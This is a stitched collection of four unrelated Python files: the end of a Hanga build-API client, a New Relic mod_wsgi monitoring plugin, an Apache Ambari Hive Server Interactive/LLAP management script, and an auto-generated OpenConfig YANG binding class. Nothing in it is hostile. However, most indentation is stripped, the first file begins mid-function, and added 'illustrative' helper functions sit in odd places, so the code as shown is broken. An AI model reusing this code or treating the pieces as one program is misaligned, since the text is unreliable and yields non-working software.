assert(exists(infos.get("keystore")))
assert(infos.get("keystore_password"))
assert(infos.get("alias"))
assert(infos.get("alias_password"))
self.ensure_configuration()
fd = None
try:
fd = open(infos["keystore"], "rb")
params = {
"platform": platform,
"name": name,
"keystore-password": infos["keystore_password"],
"alias-password": infos["alias_password"],
"alias": infos["alias"]}
files = {"keystore-file": fd}
r = self._build_request(
requests.post, "importkey", data=params, files=files)
finally:
if fd:
fd.close()
return r.json()
def _build_request(self, method, path, **kwargs):
url = "{}api/1/{}".format(self._url, path)
headers = {"X-Hanga-Api": self._key}
r = method(url, headers=headers, **kwargs)
try:
r.raise_for_status()
except requests.exceptions.HTTPError:
            # Report authentication failures explicitly; any other HTTP error
            # falls back to a generic message carrying the status code.
            if r.status_code in (401, 403):
                msg = "Access denied, invalid HANGA_API_KEY"
            else:
                msg = "Request error ({})".format(r.status_code)
raise HangaException(msg)
return r
def ensure_configuration(self):
"""
Validate that the configuration is ok to call any API commands
"""
if not self._key:
raise HangaException("Missing Hanga API Key")
if not self._url.endswith("/"):
self._url += "/"
def read_configuration(self):
"""
Read the configuration file. This is already done by the
constructor.
"""
self.config = ConfigParser()
self.config.read(self.config_fn)
if not self.config.has_section("auth"):
self.config.add_section("auth")
def write_configuration(self):
"""
Write the current configuration to the file
"""
with open(self.config_fn, "w") as fd:
self.config.write(fd)
@property
def config_fn(self):
if not exists(self.user_config_dir):
makedirs(self.user_config_dir)
return join(self.user_config_dir, 'hanga.conf')
@property
def user_config_dir(self):
return appdirs.user_config_dir('Hanga', 'Melting Rocks')
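

# ---------------------------------------------------------------------------
# Illustrative usage sketch (not part of the original module): it shows how
# the methods above are meant to be chained together. The args list, the
# "app.zip" filename and the destination directory are hypothetical
# placeholders; only HangaAPI methods defined above are used.
def _example_hanga_workflow():  # pragma: no cover
    import time
    api = HangaAPI()
    # Submit a packaged app; 'args' mirrors the build command line.
    result = api.submit(["--verbose"], "app.zip")
    if result.get("result") != "ok":
        raise HangaException(result.get("details", "submission failed"))
    uuid = result["uuid"]
    # Poll the job until it reaches a terminal state.
    while api.status(uuid).get("job_status") not in ("done", "error"):
        time.sleep(5)
    # Fetch the build artifact into the current directory.
    return api.download(uuid, ".")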
|
|
import os
import logging
import math
import psutil
try:
from ConfigParser import RawConfigParser, NoOptionError, NoSectionError
except ImportError:
from configparser import RawConfigParser, NoOptionError, NoSectionError
import mod_wsgi
from .platform import Client
from ..sampler import Sampler
from ..statistics import Metrics, Stats
_logger = logging.getLogger(__name__)
def configuration_settings(app_name=None, license_key=None,
config_file=None, environment=None):
if config_file is None:
config_file = os.environ.get('NEW_RELIC_CONFIG_FILE', None)
if config_file is not None:
config_object = RawConfigParser()
if config_file:
config_object.read([config_file])
if environment is None:
environment = os.environ.get('NEW_RELIC_ENVIRONMENT', None)
def _option(name, section='newrelic', type=None, **kwargs):
try:
getter = 'get%s' % (type or '')
return getattr(config_object, getter)(section, name)
except NoOptionError:
if 'default' in kwargs:
return kwargs['default']
else:
raise
def option(name, type=None, **kwargs):
sections = []
if environment is not None:
sections.append('newrelic-platform:%s' % environment)
sections.append('newrelic-platform')
if environment is not None:
sections.append('newrelic:%s' % environment)
sections.append('newrelic')
for section in sections:
try:
return _option(name, section, type)
except (NoOptionError, NoSectionError):
pass
if 'default' in kwargs:
return kwargs['default']
if app_name is None:
app_name = os.environ.get('NEW_RELIC_APP_NAME', None)
app_name = option('app_name', default=app_name)
if license_key is None:
license_key = os.environ.get('NEW_RELIC_LICENSE_KEY', None)
license_key = option('license_key', default=license_key)
else:
if app_name is None:
app_name = os.environ.get('NEW_RELIC_APP_NAME', None)
if license_key is None:
license_key = os.environ.get('NEW_RELIC_LICENSE_KEY', None)
if app_name is not None:
app_name = app_name.split(';')[0].strip()
return app_name, license_key
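

# Illustrative sketch (not part of the original module): demonstrates the
# fallback behaviour of configuration_settings() when no config file is
# given and only environment variables are set. The values are hypothetical.
def _example_configuration_lookup():  # pragma: no cover
    os.environ.setdefault('NEW_RELIC_APP_NAME', 'Example App;Staging Alias')
    os.environ.setdefault('NEW_RELIC_LICENSE_KEY', 'dummy-license-key')
    app_name, license_key = configuration_settings()
    # Only the first ';'-separated name is kept, i.e. 'Example App'.
    return app_name, license_key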
class Agent(object):
guid = 'au.com.dscpl.wsgi.mod_wsgi'
version = '1.1.0'
max_retries = 10
def __init__(self, sampler=None, app_name=None, license_key=None,
config_file=None, environment=None):
self.sampler = None
if mod_wsgi.version < (4, 2, 0):
_logger.fatal('Version 4.2.0 or newer of mod_wsgi is required '
'for running the New Relic platform plugin. The plugin '
'has been disabled.')
return
app_name, license_key = configuration_settings(app_name,
license_key, config_file, environment)
if not license_key or not app_name:
_logger.fatal('Either the license key or application name was '
'not specified for the New Relic platform plugin. The '
'plugin has been disabled.')
return
_logger.info('New Relic platform plugin reporting to %r.', app_name)
self.client = Client(license_key)
self.license_key = license_key
self.app_name = app_name
self.sampler = sampler or Sampler()
self.sampler.register(self.process)
self.metrics = Metrics()
self.epoch = None
self.retries = 0
def upload(self, metrics, duration):
try:
self.client.send_metrics(self.app_name, self.guid, self.version,
duration, metrics)
except self.client.RetryDataForRequest:
return True
except Exception:
pass
return False
def record(self, name, value):
name = 'Component/' + name
self.metrics.merge_value(name, value)
def rollover(self):
self.metrics = Metrics()
self.epoch = None
self.retries = 0
def process(self, scoreboard):
# Record metric to track how many Apache server instances are
# reporting. The 'Server/Instances' metric should be charted as
# a 'Count', rounded to an 'Integer'.
self.record('Server/Instances[|servers]', 0)
# If this is the first sampling period, take that to mean that
# this is a new process and Apache was just (re)started. If we
# are being told the sampler is exiting, we take it that Apache
# is being shutdown. Both can show up if shutdown during the
# first sampling period. The 'Server/Lifecycle' metrics should
# be charted as a 'Count', rounded to an 'Integer'.
if scoreboard.sample_periods == 1:
self.record('Server/Lifecycle/Starting[|servers]', 0)
if scoreboard.sampler_exiting:
self.record('Server/Lifecycle/Stopping[|servers]', 0)
        # Record metric to track how many processes are in use. This is
        # calculated as an average from the total number which were
        # reported in use in each individual sample. The
        # 'Processes/Instances' metric should be charted as a 'Count',
        # rounded to an 'Integer'.
self.record('Processes/Instances[|processes]', Stats(
count=scoreboard.processes_running))
        # Also separately record how many processes were counted as
        # having been started or stopped in the sampling period. These
        # are used to represent the amount of process churn which is
        # occurring due to Apache's dynamic management of the number
        # of processes. The 'Processes/Lifecycle' metrics should be
        # charted as a 'Count', rounded to an 'Integer'.
self.record('Processes/Lifecycle/Starting[|processes]',
Stats(count=scoreboard.processes_started_count))
self.record('Processes/Lifecycle/Stopping[|processes]',
Stats(count=scoreboard.processes_stopped_count))
# Record metric to track how many workers are in idle and busy
# states. This is calculated as an average from the total number
# which were reported in each state in each individual sample.
# The 'Workers/Availability' metrics should be charted as a
# 'Count', rounded to an 'Integer'.
self.record('Workers/Availability/Idle[|workers]', Stats(
count=scoreboard.workers_idle))
self.record('Workers/Availability/Busy[|workers]', Stats(
count=scoreboard.workers_busy))
# Record metric to track more fine grained status of each
# worker. This is calculated as an average from the total number
# which were reported in each state in each individual sample.
# The 'Workers/Status' metrics should be charted as 'Average'
# value, rounded to an 'Integer'.
for label, value in scoreboard.workers_status.items():
self.record('Workers/Status/%s[workers]' % label, value)
# Record metric to track the utilisation of the server. The
# 'Workers/Utilization' metric should be charted as 'Average
# value', with number format of 'Percentage'.
self.record('Workers/Utilization[server]',
scoreboard.workers_utilization)
# Record metric to track the request throughput. The
# 'Requests/Throughput' metric should be charted as 'Throughput'.
self.record('Requests/Throughput[|requests]', Stats(
count=scoreboard.access_count_delta,
total=scoreboard.access_count_delta))
# Record metric to track number of bytes served up. This is
# believed only to be from response content. There is no known
# separate measure for bytes uploaded. The 'Requests/Bytes Served'
# should be charted as 'Rate'.
self.record('Requests/Bytes Served[bytes]',
scoreboard.bytes_served_delta)
# Record metric to track request response time. This is
# calculated as an average from the request samples. That is, it
# is not across all requests. The 'Requests/Response Time'
# metric should be charted as 'Average'.
for request in scoreboard.request_samples:
self.record('Requests/Response Time[seconds|request]',
request.duration)
        # Record metric to track the percentile breakdown of request
        # response time. These percentiles are computed from the request
        # samples, not across all requests. The 'Requests/Percentiles'
        # metric should be charted as 'Average'.
for label, value in scoreboard.request_percentiles.items():
self.record('Requests/Percentiles/%s[seconds]' % label, value)
# Record metric to track what percentage of all requests were
# captured as samples. The 'Requests/Sample Quality' metric
# should be charted as 'Average' converted to a 'Percentage'.
self.record('Requests/Sample Quality[requests]',
scoreboard.request_samples_quality)
user_time = 0.0
system_time = 0.0
memory_rss = 0
for process in scoreboard.processes_system_info.values():
user_time += process['cpu_user_time']
system_time += process['cpu_system_time']
memory_rss += process['memory_rss']
# Record metric to track memory usage by processes. The
# 'Processes/Memory/Physical' metric should be charted as
# 'Average'.
self.record('Processes/Memory/Physical[bytes]',
process['memory_rss'])
# Record metrics to track the number of context switches.
# The 'Processes/Context Switches' metrics should be charted
# as 'Rate'.
self.record('Processes/Context Switches/Voluntary[context]',
process['ctx_switch_voluntary'])
self.record('Processes/Context Switches/Involuntary[context]',
process['ctx_switch_involuntary'])
# Record metric to track combined memory usage of whole server.
# The 'Server/Memory/Physical' metric should be charted as
# 'Average'.
self.record('Server/Memory/Physical[bytes]', memory_rss)
# Record metric to track the CPU usage for user and system. The
# 'Processes/CPU Usage' metric should be charted as 'Rate'.
self.record('Processes/CPU Usage[cpu]', user_time + system_time)
self.record('Processes/CPU Usage/User[cpu]', user_time)
self.record('Processes/CPU Usage/System[cpu]', system_time)
        # Now attempt to upload the metric data to New Relic. Make sure
        # we don't try to upload data from too short a sampling period,
        # as it would be rejected anyway. Retain any data which is too
        # short so it is merged with the subsequent sampling period.
if self.epoch is not None:
duration = scoreboard.period_end - self.epoch
else:
duration = scoreboard.duration
if duration > 1.0:
retry = self.upload(self.metrics.metrics, duration)
else:
retry = True
        # If a failure occurred but the failure type was such that we
        # could try again to upload the data, then retain the metrics
        # for next time. If we have too many failed attempts though, we
        # give up.
if retry:
self.retries += 1
if self.retries == self.max_retries:
self.rollover()
elif self.epoch is None:
self.epoch = scoreboard.period_start
else:
self.rollover()
def start(self):
if self.sampler is not None:
self.sampler.start()
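

# Illustrative wiring sketch (not part of the original module): under
# mod_wsgi >= 4.2.0 the plugin would typically be constructed once per
# process and started so the sampler begins reporting. The app name and
# license key below are hypothetical placeholders.
def _example_start_agent():  # pragma: no cover
    agent = Agent(app_name='Example App', license_key='dummy-license-key')
    agent.start()
    return agent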
|
|
#!/usr/bin/env python
"""
Licensed to the Apache Software Foundation (ASF) under one
or more contributor license agreements. See the NOTICE file
distributed with this work for additional information
regarding copyright ownership. The ASF licenses this file
to you under the Apache License, Version 2.0 (the
"License"); you may not use this file except in compliance
with the License. You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
# Python Imports
import subprocess
import os
import re
import time
import shutil
from datetime import datetime
import json
# Ambari Commons & Resource Management imports
from resource_management.libraries.script.script import Script
from resource_management.libraries.functions import format
from resource_management.libraries.functions.check_process_status import check_process_status
from resource_management.core.source import InlineTemplate
from resource_management.core.resources.system import Execute
# Imports needed for Rolling/Express Upgrade
from resource_management.libraries.functions import StackFeature
from resource_management.libraries.functions.stack_features import check_stack_feature
from resource_management.libraries.functions import conf_select
from resource_management.libraries.functions import stack_select
from resource_management.libraries.functions.copy_tarball import copy_to_hdfs
from resource_management.core import shell
from resource_management.core.exceptions import Fail
from resource_management.core.logger import Logger
from ambari_commons import OSCheck, OSConst
from ambari_commons.os_family_impl import OsFamilyImpl
from resource_management.core.exceptions import ComponentIsNotRunning
from resource_management.libraries.functions.decorator import retry
from resource_management.libraries.functions.security_commons import build_expectations, \
cached_kinit_executor, get_params_from_filesystem, validate_security_config_properties, \
FILE_TYPE_XML
# Local Imports
from setup_ranger_hive import setup_ranger_hive
from hive_service_interactive import hive_service_interactive
from hive_interactive import hive_interactive
from hive_server import HiveServerDefault
from setup_ranger_hive_interactive import setup_ranger_hive_interactive
import traceback
class HiveServerInteractive(Script):
pass
@OsFamilyImpl(os_family=OsFamilyImpl.DEFAULT)
class HiveServerInteractiveDefault(HiveServerInteractive):
def get_component_name(self):
return "hive-server2-hive2"
def install(self, env):
import params
self.install_packages(env)
def configure(self, env):
import params
env.set_params(params)
hive_interactive(name='hiveserver2')
def pre_upgrade_restart(self, env, upgrade_type=None):
Logger.info("Executing Hive Server Interactive Stack Upgrade pre-restart")
import params
env.set_params(params)
if params.version and check_stack_feature(StackFeature.ROLLING_UPGRADE, params.version):
stack_select.select("hive-server2-hive2", params.version)
conf_select.select(params.stack_name, "hive2", params.version)
# Copy hive.tar.gz and tez.tar.gz used by Hive Interactive to HDFS
resource_created = copy_to_hdfs(
"hive2",
params.user_group,
params.hdfs_user,
host_sys_prepped=params.host_sys_prepped)
resource_created = copy_to_hdfs(
"tez_hive2",
params.user_group,
params.hdfs_user,
host_sys_prepped=params.host_sys_prepped) or resource_created
if resource_created:
params.HdfsResource(None, action="execute")
def start(self, env, upgrade_type=None):
import params
env.set_params(params)
self.configure(env)
if params.security_enabled:
# Do the security setup, internally calls do_kinit()
self.setup_security()
# TODO : We need have conditional [re]start of LLAP once "status check command" for LLAP is ready.
# Check status and based on that decide on [re]starting.
# Start LLAP before Hive Server Interactive start.
status = self._llap_start(env)
if not status:
raise Fail("Skipping START of Hive Server Interactive since LLAP app couldn't be STARTED.")
# TODO : test the workability of Ranger and Hive2 during upgrade
setup_ranger_hive_interactive(upgrade_type=upgrade_type)
hive_service_interactive('hiveserver2', action='start', upgrade_type=upgrade_type)
def stop(self, env, upgrade_type=None):
import params
env.set_params(params)
if params.security_enabled:
self.do_kinit()
# Stop Hive Interactive Server first
hive_service_interactive('hiveserver2', action='stop')
self._llap_stop(env)
def status(self, env):
import status_params
env.set_params(status_params)
    # We are not doing the 'llap' status check here as part of the 'HSI' status check,
    # as the 'llap' status check is a heavyweight operation.
    pid_file = format("{hive_pid_dir}/{hive_interactive_pid}")
    # Check that the HiveServer2 Interactive process referenced by the pid file is running.
    check_process_status(pid_file)
def security_status(self, env):
import status_params
env.set_params(status_params)
if status_params.security_enabled:
props_value_check = {"hive.server2.authentication": "KERBEROS",
"hive.metastore.sasl.enabled": "true",
"hive.security.authorization.enabled": "true"}
props_empty_check = ["hive.server2.authentication.kerberos.keytab",
"hive.server2.authentication.kerberos.principal",
"hive.server2.authentication.spnego.principal",
"hive.server2.authentication.spnego.keytab"]
props_read_check = ["hive.server2.authentication.kerberos.keytab",
"hive.server2.authentication.spnego.keytab"]
hive_site_props = build_expectations('hive-site', props_value_check, props_empty_check,
props_read_check)
hive_expectations ={}
hive_expectations.update(hive_site_props)
security_params = get_params_from_filesystem(status_params.hive_server_interactive_conf_dir,
{'hive-site.xml': FILE_TYPE_XML})
result_issues = validate_security_config_properties(security_params, hive_expectations)
if not result_issues: # If all validations passed successfully
try:
# Double check the dict before calling execute
if 'hive-site' not in security_params \
or 'hive.server2.authentication.kerberos.keytab' not in security_params['hive-site'] \
or 'hive.server2.authentication.kerberos.principal' not in security_params['hive-site'] \
or 'hive.server2.authentication.spnego.keytab' not in security_params['hive-site'] \
or 'hive.server2.authentication.spnego.principal' not in security_params['hive-site']:
self.put_structured_out({"securityState": "UNSECURED"})
self.put_structured_out({"securityIssuesFound": "Keytab file or principal are not set property."})
return
cached_kinit_executor(status_params.kinit_path_local,
status_params.hive_user,
security_params['hive-site']['hive.server2.authentication.kerberos.keytab'],
security_params['hive-site']['hive.server2.authentication.kerberos.principal'],
status_params.hostname,
status_params.tmp_dir)
cached_kinit_executor(status_params.kinit_path_local,
status_params.hive_user,
security_params['hive-site']['hive.server2.authentication.spnego.keytab'],
security_params['hive-site']['hive.server2.authentication.spnego.principal'],
status_params.hostname,
status_params.tmp_dir)
self.put_structured_out({"securityState": "SECURED_KERBEROS"})
except Exception as e:
self.put_structured_out({"securityState": "ERROR"})
self.put_structured_out({"securityStateErrorInfo": str(e)})
else:
issues = []
for cf in result_issues:
issues.append("Configuration file %s did not pass the validation. Reason: %s" % (cf, result_issues[cf]))
self.put_structured_out({"securityIssuesFound": ". ".join(issues)})
self.put_structured_out({"securityState": "UNSECURED"})
else:
self.put_structured_out({"securityState": "UNSECURED"})
def restart_llap(self, env):
"""
Custom command to Restart LLAP
"""
Logger.info("Custom Command to retart LLAP")
import params
env.set_params(params)
if params.security_enabled:
self.do_kinit()
self._llap_stop(env)
self._llap_start(env)
def _llap_stop(self, env):
import params
Logger.info("Stopping LLAP")
SLIDER_APP_NAME = "llap0"
stop_cmd = ["slider", "stop", SLIDER_APP_NAME]
code, output, error = shell.call(stop_cmd, user=params.hive_user, stderr=subprocess.PIPE, logoutput=True)
if code == 0:
Logger.info(format("Stopped {SLIDER_APP_NAME} application on Slider successfully"))
elif code == 69 and output is not None and "Unknown application instance" in output:
Logger.info(format("Application {SLIDER_APP_NAME} was already stopped on Slider"))
else:
raise Fail(format("Could not stop application {SLIDER_APP_NAME} on Slider. {error}\n{output}"))
# Will exit with code 4 if need to run with "--force" to delete directories and registries.
Execute(('slider', 'destroy', SLIDER_APP_NAME, "--force"),
user=params.hive_user,
timeout=30,
ignore_failures=True,
)
"""
Controls the start of LLAP.
"""
def _llap_start(self, env, cleanup=False):
import params
env.set_params(params)
Logger.info("Starting LLAP")
LLAP_PACKAGE_CREATION_PATH = Script.get_tmp_dir()
LLAP_APP_NAME = 'llap0'
unique_name = "llap-slider%s" % datetime.utcnow().strftime('%Y-%m-%d_%H-%M-%S')
cmd = format("{stack_root}/current/hive-server2-hive2/bin/hive --service llap --instances {params.num_llap_nodes}"
" --slider-am-container-mb {params.slider_am_container_mb} --size {params.llap_daemon_container_size}m "
" --cache {params.hive_llap_io_mem_size}m --xmx {params.llap_heap_size}m --loglevel {params.llap_log_level}"
" --output {LLAP_PACKAGE_CREATION_PATH}/{unique_name}")
if params.security_enabled:
llap_keytab_splits = params.hive_llap_keytab_file.split("/")
Logger.debug("llap_keytab_splits : {0}".format(llap_keytab_splits))
cmd += format(" --slider-keytab-dir .slider/keytabs/{params.hive_user}/ --slider-keytab "
"{llap_keytab_splits[4]} --slider-principal {params.hive_llap_principal}")
# Append args.
llap_java_args = InlineTemplate(params.llap_app_java_opts).get_content()
cmd += format(" --args \" {llap_java_args}\"")
run_file_path = None
try:
Logger.info(format("Command: {cmd}"))
code, output, error = shell.checked_call(cmd, user=params.hive_user, stderr=subprocess.PIPE, logoutput=True)
if code != 0 or output is None:
raise Fail("Command failed with either non-zero return code or no output.")
# E.g., output:
# Prepared llap-slider-05Apr2016/run.sh for running LLAP on Slider
exp = r"Prepared (.*?run.sh) for running LLAP"
run_file_path = None
out_splits = output.split("\n")
for line in out_splits:
line = line.strip()
m = re.match(exp, line, re.I)
if m and len(m.groups()) == 1:
run_file_name = m.group(1)
run_file_path = os.path.join(params.hive_user_home_dir, run_file_name)
break
if not run_file_path:
raise Fail("Did not find run.sh file in output: " + str(output))
Logger.info(format("Run file path: {run_file_path}"))
Execute(run_file_path, user=params.hive_user)
Logger.info("Submitted LLAP app name : {0}".format(LLAP_APP_NAME))
      # We need to check the status of the LLAP app to figure out whether it got
      # launched properly and is in running state. Only then go ahead with the Hive Server Interactive start.
status = self.check_llap_app_status(LLAP_APP_NAME, params.num_retries_for_checking_llap_status)
if status:
Logger.info("LLAP app '{0}' deployed successfully.".format(LLAP_APP_NAME))
return True
else:
Logger.error("LLAP app '{0}' deployment unsuccessful.".format(LLAP_APP_NAME))
return False
except:
# Attempt to clean up the packaged application, or potentially rename it with a .bak
if run_file_path is not None and cleanup:
try:
parent_dir = os.path.dirname(run_file_path)
if os.path.isdir(parent_dir):
shutil.rmtree(parent_dir)
except Exception, e:
Logger.error("Could not cleanup LLAP app package. Error: " + str(e))
# throw the original exception
raise
"""
Does kinit and copies keytab for Hive/LLAP to HDFS.
"""
def setup_security(self):
import params
self.do_kinit()
# Copy params.hive_llap_keytab_file to hdfs://<host>:<port>/user/<hive_user>/.slider/keytabs/<hive_user> , required by LLAP
slider_keytab_install_cmd = format("slider install-keytab --keytab {params.hive_llap_keytab_file} --folder {params.hive_user} --overwrite")
Execute(slider_keytab_install_cmd, user=params.hive_user)
def do_kinit(self):
import params
hive_interactive_kinit_cmd = format("{kinit_path_local} -kt {params.hive_server2_keytab} {params.hive_principal}; ")
Execute(hive_interactive_kinit_cmd, user=params.hive_user)
llap_kinit_cmd = format("{kinit_path_local} -kt {params.hive_llap_keytab_file} {params.hive_llap_principal}; ")
Execute(llap_kinit_cmd, user=params.hive_user)
"""
Get llap app status data.
"""
def _get_llap_app_status_info(self, app_name):
import status_params
LLAP_APP_STATUS_CMD_TIMEOUT = 0
llap_status_cmd = format("{stack_root}/current/hive-server2-hive2/bin/hive --service llapstatus --name {app_name} --findAppTimeout {LLAP_APP_STATUS_CMD_TIMEOUT}")
code, output, error = shell.checked_call(llap_status_cmd, user=status_params.hive_user, stderr=subprocess.PIPE,
logoutput=False)
Logger.info("Received 'llapstatus' command 'output' : {0}".format(output))
return self._make_valid_json(output)
"""
Remove extra lines from 'llapstatus' status output (eg: because of MOTD logging) so as to have a valid JSON data to be passed in
to JSON converter.
"""
def _make_valid_json(self, output):
'''
Note: It is assumed right now that extra lines will be only at the start and not at the end.
Sample expected JSON to be passed for 'loads' is either of the form :
Case 'A':
{
"amInfo" : {
"appName" : "llap0",
"appType" : "org-apache-slider",
"appId" : "APP1",
"containerId" : "container_1466036628595_0010_01_000001",
"hostname" : "hostName",
"amWebUrl" : "http://hostName:port/"
},
"state" : "LAUNCHING",
....
"desiredInstances" : 1,
"liveInstances" : 0,
....
....
}
or
Case 'B':
{
"state" : "APP_NOT_FOUND"
}
'''
splits = output.split("\n")
len_splits = len(splits)
if (len_splits < 3):
raise Fail ("Malformed JSON data received from 'llapstatus' command. Exiting ....")
marker_idx = None # To detect where from to start reading for JSON data
for idx, split in enumerate(splits):
curr_elem = split.strip()
if idx+2 > len_splits:
raise Fail("Iterated over the received 'llapstatus' comamnd. Couldn't validate the received output for JSON parsing.")
next_elem = (splits[(idx + 1)]).strip()
if curr_elem == "{":
if next_elem == "\"amInfo\" : {" and (splits[len_splits-1]).strip() == '}':
# For Case 'A'
marker_idx = idx
break;
elif idx+3 == len_splits and next_elem.startswith('"state" : ') and (splits[idx + 2]).strip() == '}':
# For Case 'B'
marker_idx = idx
break;
Logger.info("Marker index for start of JSON data for 'llapsrtatus' comamnd : {0}".format(marker_idx))
# Remove extra logging from possible JSON output
if marker_idx is None:
raise Fail("Couldn't validate the received output for JSON parsing.")
else:
if marker_idx != 0:
del splits[0:marker_idx]
Logger.info("Removed lines: '1-{0}' from the received 'llapstatus' output to make it valid for JSON parsing.".format(marker_idx))
scanned_output = '\n'.join(splits)
llap_app_info = json.loads(scanned_output)
return llap_app_info
"""
Checks llap app status. The states can be : 'COMPLETE', 'APP_NOT_FOUND', 'RUNNING_PARTIAL', 'RUNNING_ALL' & 'LAUNCHING'.
if app is in 'APP_NOT_FOUND', 'RUNNING_PARTIAL' and 'LAUNCHING' state:
we wait for 'num_times_to_wait' to have app in (1). 'RUNNING_ALL' or (2). 'RUNNING_PARTIAL'
state with 80% or more 'desiredInstances' running and Return True
else :
Return False
Parameters: llap_app_name : deployed llap app name.
num_retries : Number of retries to check the LLAP app status.
"""
def check_llap_app_status(self, llap_app_name, num_retries):
# counters based on various states.
curr_time = time.time()
if num_retries <= 0:
num_retries = 2
if num_retries > 20:
num_retries = 20
@retry(times=num_retries, sleep_time=2, err_class=Fail)
def do_retries():
live_instances = 0
desired_instances = 0
percent_desired_instances_to_be_up = 80 # Used in 'RUNNING_PARTIAL' state.
llap_app_info = self._get_llap_app_status_info(llap_app_name)
if llap_app_info is None or 'state' not in llap_app_info:
Logger.error("Malformed JSON data received for LLAP app. Exiting ....")
return False
if llap_app_info['state'].upper() == 'RUNNING_ALL':
Logger.info(
"LLAP app '{0}' in '{1}' state.".format(llap_app_name, llap_app_info['state']))
return True
elif llap_app_info['state'].upper() == 'RUNNING_PARTIAL':
# Check how many instances were up.
if 'liveInstances' in llap_app_info and 'desiredInstances' in llap_app_info:
live_instances = llap_app_info['liveInstances']
desired_instances = llap_app_info['desiredInstances']
else:
Logger.info(
"LLAP app '{0}' is in '{1}' state, but 'instances' information not available in JSON received. " \
"Exiting ....".format(llap_app_name, llap_app_info['state']))
Logger.info(llap_app_info)
return False
if desired_instances == 0:
Logger.info("LLAP app '{0}' desired instance are set to 0. Exiting ....".format(llap_app_name))
return False
percentInstancesUp = 0
if live_instances > 0:
percentInstancesUp = float(live_instances) / desired_instances * 100
if percentInstancesUp >= percent_desired_instances_to_be_up:
Logger.info("LLAP app '{0}' in '{1}' state. Live Instances : '{2}' >= {3}% of Desired Instances : " \
"'{4}'.".format(llap_app_name, llap_app_info['state'],
llap_app_info['liveInstances'],
percent_desired_instances_to_be_up,
llap_app_info['desiredInstances']))
return True
else:
Logger.info("LLAP app '{0}' in '{1}' state. Live Instances : '{2}'. Desired Instances : " \
"'{3}' after {4} secs.".format(llap_app_name, llap_app_info['state'],
llap_app_info['liveInstances'],
llap_app_info['desiredInstances'],
time.time() - curr_time))
raise Fail("App state is RUNNING_PARTIAL. Live Instances : '{0}', Desired Instance : '{1}'".format(llap_app_info['liveInstances'],
llap_app_info['desiredInstances']))
elif llap_app_info['state'].upper() in ['APP_NOT_FOUND', 'LAUNCHING', 'COMPLETE']:
status_str = format("LLAP app '{0}' current state is {1}.".format(llap_app_name, llap_app_info['state']))
Logger.info(status_str)
raise Fail(status_str)
else: # Covers any unknown that we get.
Logger.info(
"LLAP app '{0}' current state is '{1}'. Expected : 'RUNNING'.".format(llap_app_name, llap_app_info['state']))
return False
try:
status = do_retries()
return status
except Exception, e:
Logger.info("LLAP app '{0}' did not come up after a wait of {1} seconds.".format(llap_app_name,
time.time() - curr_time))
traceback.print_exc()
return False
def get_log_folder(self):
import params
return params.hive_log_dir
def get_user(self):
import params
return params.hive_user
@OsFamilyImpl(os_family=OSConst.WINSRV_FAMILY)
class HiveServerInteractiveWindows(HiveServerInteractive):
def status(self, env):
pass
if __name__ == "__main__":
HiveServerInteractive().execute()
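

# Illustrative sketch (not part of the original script): the idea behind
# _make_valid_json() above is to drop any banner/MOTD lines printed before
# the JSON document emitted by 'hive --service llapstatus'. A minimal,
# dependency-free version of that idea looks like this; the function name
# and the way it would be called are hypothetical.
def _example_strip_leading_noise(output):
    lines = output.split("\n")
    for idx, line in enumerate(lines):
        # The JSON document starts at the first line that is exactly '{'.
        if line.strip() == "{":
            return json.loads("\n".join(lines[idx:]))
    raise ValueError("no JSON object found in llapstatus output")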
|
|
# -*- coding: utf-8 -*-
from operator import attrgetter
from pyangbind.lib.yangtypes import RestrictedPrecisionDecimalType
from pyangbind.lib.yangtypes import RestrictedClassType
from pyangbind.lib.yangtypes import TypedListType
from pyangbind.lib.yangtypes import YANGBool
from pyangbind.lib.yangtypes import YANGListType
from pyangbind.lib.yangtypes import YANGDynClass
from pyangbind.lib.yangtypes import ReferenceType
from pyangbind.lib.base import PybindBase
from collections import OrderedDict
from decimal import Decimal
from bitarray import bitarray
import six
# PY3 support of some PY2 keywords (needs improvement)
if six.PY3:
import builtins as __builtin__
long = int
elif six.PY2:
import __builtin__
from . import state
from . import neighbors
class isis_neighbor_attribute(PybindBase):
"""
This class was auto-generated by the PythonClass plugin for PYANG
from YANG module openconfig-network-instance - based on the path /network-instances/network-instance/protocols/protocol/isis/levels/level/link-state-database/lsp/tlvs/tlv/isis-neighbor-attribute. Each member element of
the container is represented as a class variable - with a specific
YANG type.
YANG Description: This container defines list of ISIS topology neighbors
for extended ISIS LSP(multiple system IDs).
"""
__slots__ = ("_path_helper", "_extmethods", "__state", "__neighbors")
_yang_name = "isis-neighbor-attribute"
_pybind_generated_by = "container"
def __init__(self, *args, **kwargs):
self._path_helper = False
self._extmethods = False
self.__state = YANGDynClass(
base=state.state,
is_container="container",
yang_name="state",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
extensions=None,
namespace="http://openconfig.net/yang/network-instance",
defining_module="openconfig-network-instance",
yang_type="container",
is_config=False,
)
self.__neighbors = YANGDynClass(
base=neighbors.neighbors,
is_container="container",
yang_name="neighbors",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
extensions=None,
namespace="http://openconfig.net/yang/network-instance",
defining_module="openconfig-network-instance",
yang_type="container",
is_config=False,
)
load = kwargs.pop("load", None)
if args:
if len(args) > 1:
raise TypeError("cannot create a YANG container with >1 argument")
all_attr = True
for e in self._pyangbind_elements:
if not hasattr(args[0], e):
all_attr = False
break
if not all_attr:
raise ValueError("Supplied object did not have the correct attributes")
for e in self._pyangbind_elements:
nobj = getattr(args[0], e)
if nobj._changed() is False:
continue
setmethod = getattr(self, "_set_%s" % e)
if load is None:
setmethod(getattr(args[0], e))
else:
setmethod(getattr(args[0], e), load=load)
def _path(self):
if hasattr(self, "_parent"):
return self._parent._path() + [self._yang_name]
else:
return [
"network-instances",
"network-instance",
"protocols",
"protocol",
"isis",
"levels",
"level",
"link-state-database",
"lsp",
"tlvs",
"tlv",
"isis-neighbor-attribute",
]
def _get_state(self):
"""
Getter method for state, mapped from YANG variable /network_instances/network_instance/protocols/protocol/isis/levels/level/link_state_database/lsp/tlvs/tlv/isis_neighbor_attribute/state (container)
YANG Description: This container describes IS neighbor attribute state.
"""
return self.__state
def _set_state(self, v, load=False):
"""
